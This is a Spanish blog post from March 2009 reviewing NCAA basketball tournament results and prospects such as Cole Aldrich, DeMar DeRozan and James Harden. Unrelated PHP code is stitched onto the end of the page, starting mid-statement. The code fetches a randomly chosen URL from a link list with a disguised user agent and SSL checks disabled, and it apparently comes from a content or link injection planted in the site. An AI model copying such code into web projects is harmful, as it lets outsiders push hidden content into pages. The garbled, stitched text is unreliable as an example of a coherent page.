Siguiendo el guión previsto

23 de March de 2009 por txusma

Tras los enfrentamientos de ayer ya han quedado definidas las seminifinales regionales. Aparte de Wake Forest, que ha dejado su sitio a Arizona, el resto de favoritos han cumplido y se han colocado, con más o menos contundencia, a 2 partidos de la Final Four.

Comentábamos hace un par de días que encontrar un enfrentamiento entre el equipo número 12 y el 13 de una misma región es muy complicado. Este año se ha producido pero con un poco de trampa. La Arizona de Budinger, Hill y Wise está muy por encima de esa posición 12 que le otorgaron los expertos. Anoche se deshacieron con facilidad de Cleveland State con Nick Wise como máximo anotador con 21 puntos y Jordan Hill y Chase Budinger colaborando con 16 puntos y 9 rebotes el primero y 15 puntos el segundo. Hill es un ala-pívot de grandes condiciones atléticas y potencia pero al que le faltan muchos de los fundamentos defensivos ni ofensivos de este deporte. Su potencial es innegable pero le queda mucho por mejorar. Ahora los Wildcats se verán las caras con Lousville que pasó algún apuro más de los previstos para doblegar a Siena. Por suerte, los 24 puntos y 15 rebotes del alero Terrence Williams acudieron al rescate.

Por su parte, tampoco tuvo muchos problemas Kansas, actuales campeones, para doblegar a Dayton comandados por dos jugadores que darán que hablar posiblemente el próximo año: Sharron Collins y sobretodo Cole Aldrich. El primero anotó ayer 25 puntos y el segundo consiguió un triple doble brutal. 13 puntos, 20 rebotes y 10 tapones para este center que aparece con el número 5 en los mocks del 2010. Otro al que hay que echarle un ojo.

Más le costó a Michigan State superar a una USC en la que Demar DeRozan anotó 18 puntos. Fue un partido que se decidió en los minutos finales en lo que los Spartans estuvieron más acertados. En nombrado jugador defensivo del año en la Big Ten, Travis Walton, lideró a su equipo con 18 puntos. Aunque DeRozan tiene unas condiciones fenomenales bien haría en quedarse un año más en la universidad y pulir sus defectos.

En la región Este se enfrentarán en semifinales Pittsburgh y Xavier tras eliminar respectivamente a Oklahoma State y Wisconsin con más dificultades de las previstas. Esta vez la estrella de los Panthers no fue DaJuan Blair que se quedó en 10 puntos y 12 rebotes, sinó Sam Young que se fue hasta los 32 puntos. Este alero de último año, gran defensor y reboteador, aparece en las últimas posiciones de la primera ronda del draft. Los Muskeeters de Xavier, por su parte, vieron como caían una vez en la telaraña defensiva de Wisconsin durante los primeros 30 minutos. A partir de ese momento consiguieron abrir una grieta y vencer en un complicado partido.

Missouri, que decidió en los últimos segundos su partido contra Marquette, y Syracuse, que se deshizo de Arizona State también estarán en semifinales. Los primeros tuvieron que poner toda la carne en el asador para vencer al equipo de Jerel McNeal, 30 puntos y posible segunda ronda y Wesley Matthews. Y los segundos no tuvieron muchos problemas para vencer a los Sun Devils de James Harden que de nuevo nos dejó una actuación un tanto decepcionante. Muy vigilado por la defensa orange y con pocas oportunidades tan solo pudo anotar 10 puntos que completó con 6 rebotes y 5 asistencias. Nos quedamos con la sensación de no haber podido ver todo lo que Harden tiene dentro.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>